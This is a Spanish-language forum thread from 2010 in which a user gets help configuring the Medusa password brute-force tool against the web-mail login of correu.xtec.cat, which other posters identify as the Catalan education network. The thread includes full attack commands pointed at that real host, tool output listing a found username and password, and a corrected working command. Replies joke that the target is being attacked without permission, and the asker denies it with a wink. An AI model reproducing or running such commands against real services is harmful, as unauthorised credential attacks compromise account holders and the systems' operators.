MEDUSA WEB-FORM

Iniciado por kimpa2007, 28 Abril 2010, 23:25 PM

0 Miembros y 3 Visitantes están viendo este tema.

kimpa2007

Buenasss

mirad estoy haciendo pruebas con el medusa pero tengo un problema.
segun tengo entendido el problema esta en form-data pero no acabo de entender como funciona..

La orden que uso es la siguiente:

medusa -u usuario -P /rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"post?user=&pass" -m DENY-SIGNAL:"incorrect" -h correu.xtec.cat

Si alguien puede ayudarme ;P

toxeek


Que tal.

Podrias poner que error te suelta?? Siempre dad la maxima info posible (errores...etc.) cuando pidais ayuda para un error como este.

Que version de Medusa usas ?


SaluDoS.
"La envidia es una declaración de inferioridad"
Napoleón.

kimpa2007

pos mira cuando ejecuto la orden solo hace la primera palabra de la wordlist:

GENERAL: Module parameter: FORM:iwc_static/layout/login.html
GENERAL: Module parameter: FORM-DATA:post?user=&pass
GENERAL: Module parameter: DENY-SIGNAL:incorrect
GENERAL: Parallel Hosts: 1 Parallel Logins: 1
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 10000

ACCOUNT CHECK: [web-form] Host: correu.xtec.cat (1 of 1, 0 complete) User: rstein2 (1 of 1, 0 complete) Password: rs0001 (1 of 10000 complete)
ACCOUNT FOUND: [web-form] Host: correu.xtec.cat User: rstein2 Password: rs0001 [SUCCESS]

INFO: Login Module: 0 - Current user password list is complete, selecting next user.
INFO: Login Module: 0 - Current user password list is complete, rescanning userlist for unfinished credentials.
INFO: Login Module: 0 - Current user password list is complete, selecting next user.
INFO: Login Module: 0 - No more user accounts available for testing.
INFO: Login Module: 0 - No more users/passwords available in the normal queue.
INFO: Login Module: 0 - No additional missed users/passwords, setting credential status to CREDENTIAL_DONE.
GENERAL: Medusa has finished.

kimpa2007

aa y la versión que uso es la v2.0

toxeek


Que tal.


Citarmedusa -u usuario -P /rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"post?user=&pass" -m DENY-SIGNAL:"incorrect" -h correu.xtec.cat

Primero, prueba a poner un "=" (sin comillas) tras pass. O sea, que quede &pass=

Ademas, mira en el source del (x)HTML como el form esta elaborado. Si hay algun value para inputs tipo hidden a*adelos, y si Submit tiene un value (por ejemplo submit) pondlo en la cadena para -m FORM tambien.


Bueno prueba y ve diciendo  ;)


Saludos.

"La envidia es una declaración de inferioridad"
Napoleón.

toxeek


Citariwc_static/layout/login.html
??

No sera un .php ???
Mira a ver hacia donde apunta el METHOD del form .. y asegurate que va sobre POST!


Saludos.
"La envidia es una declaración de inferioridad"
Napoleón.

kimpa2007

Ei ya he encontrado mi problema!!
Usando el HTTP live headers he podido ver que me habia equivocado en el form-data.
La orden que tengo que usar es esa:

medusa -u user -P /diccionaris/rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"fromlogin=true&username=&pass=" -m DENY-SIGNAL:"El" -h correu.xtec.cat -F

gracias por la ayuda ;P

Debci

Hay.... que li vols fer a l´xtec?

Salutacions...

dazoverride

XD xtec? jajajajaja

això em sona :P no seas malooo !!
Si reproduces un CD de Microsoft al revés puedes escuchar un mensaje satánico...
Eso no es lo peor... Al derecho te instala windows...

kimpa2007

jajaja yo acer algo malo a la xtec?
nunca de la vida ;)